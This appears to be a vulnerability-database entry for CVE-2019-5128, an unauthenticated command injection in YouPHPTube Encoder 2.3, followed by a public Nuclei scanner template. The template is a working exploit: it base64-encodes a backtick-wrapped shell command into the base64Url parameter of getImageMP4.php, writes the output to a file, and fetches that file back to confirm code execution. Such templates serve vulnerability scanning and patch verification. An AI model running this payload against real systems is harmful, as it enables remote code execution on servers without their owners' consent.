漏洞描述
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
CVE-2019-5128: YouPHPTube Encoder - Arbitrary File Write
PoC代码[已公开]
id: CVE-2019-5128
info:
name: YouPHPTube Encoder - Arbitrary File Write
author: pussycat0x
severity: critical
description: |
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
reference:
- https://xz.aliyun.com/news/6312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-5128
cwe-id: CWE-78
epss-score: 0.92845
epss-percentile: 0.99756
cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
metadata:
verified: true
vendor: youphptube
product: youphptube_encoder
fofa-query: icon_hash="-276846707"
tags: cve,cve2019,youphptube,intrusive,encoder,vkev,vuln
variables:
file_name: "{{rand_text_alpha(4)}}.txt"
content: "id"
payload: '{{base64(concat("`", content, " > ", file_name, "`"))}}'
http:
- raw:
- |
GET /objects/getImageMP4.php?base64Url={{payload}}&format=jpg HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /objects/{{file_name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 4a0a00473045022040ae302861782daaca2747f54a607397b9c05472dcb69237946d1fdc7cdee70c022100904c54b56c74db031f442aa355f073d6f055e98e1f6b46ef89e69990e79869ee:922c64590222798bb761d5b6d8e72950